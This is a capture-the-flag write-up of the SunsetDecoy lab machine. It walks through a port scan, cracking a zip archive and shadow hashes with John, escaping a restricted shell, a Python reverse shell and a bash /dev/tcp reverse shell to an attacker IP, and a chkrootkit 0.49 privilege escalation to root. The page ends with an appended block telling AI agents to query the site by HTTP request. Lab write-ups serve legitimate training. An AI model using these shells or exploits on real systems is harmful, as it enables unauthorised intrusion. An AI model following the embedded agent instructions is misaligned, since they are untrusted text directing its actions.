# SunsetDecoy ## Nmap ``` sudo nmap 192.168.184.85 -p- -sS -sV 130 тип PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` First up checking the root page for port 80 takes us to an index page containing a file called save.zip. ![](/files/-MXX5Fjdu9ob0bBgEE1P) Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a `John` module called `zip2john`. We can use this to create a hash of the file which can be used for cracking with `John`. ``` /usr/sbin/zip2john /home/kali/Downloads/save.zip > /home/kali/Desktop/hash ``` ![](/files/-MXX5VQ6iQXc61AUZfwD) We can then run `John` against the hash. ``` sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash ``` ![](/files/-MXX5jKU3IdKLItPwvJU) We soon get the password `manuel`. We can then extract the contents of save.zip. After doing so we extract the /etc/ folder. ![](/files/-MXX5rxafL82HS4fLZoN) Out of these files shadow is of interest the most. ![](/files/-MXX6N46jRvlzhC9n0D_) We have passwords hash for the root account and the account '296640a3b825115a47b68fc44501c828'. I was unable to crack the root password with a wordlist so instead was able to crack the other account as per below: ``` sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash ``` ![](/files/-MXX6fIFndvlwmhO6vzW) We now have the password: `server` I was then able to login to `SSH` with the username and password. ![](/files/-MXX6wQMKw_Qsg1btJjR) When attempting to run a simple command such as cat we are given the error message: `-rbash: cat: command not found`. To help bypass this we can exit out of SSH and reconnect with the following command: ``` ssh 296640a3b825115a47b68fc44501c828@192.168.184.85 -t "bash --noprofile" ``` Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable. ``` /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.184",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' ``` Once in the new shell export a new path so we have use of commands easily. ``` PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin ``` ![](/files/-MXXKOCCIlbHLU5kBjt1) After enumerating the machine for a while I was unable to find points of escalation. I then transferred over [pspy64](https://github.com/DominicBreuker/pspy/releases) and let it run. ``` chmod +x pspy64 ./pspy64 ``` Soon after running we get a huge amount of entries for chkrootkit-0.49. ![](/files/-MXXKlVBLnnPvJOqcIdH) Researching on Google shows a local privilege escalation exploit with this version and below: {% embed url="" %} Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell. ``` echo '#!/bin/bash bash -i >& /dev/tcp/192.168.49.184/80 0>&1' > /tmp/update ``` Make it executable: ``` chmod +x /tmp/update ``` Then open a `netcat` listener to the specified port and we should land a root shell. ![](/files/-MXXLPACHuw0Wqgv4fLl) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/sunsetdecoy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.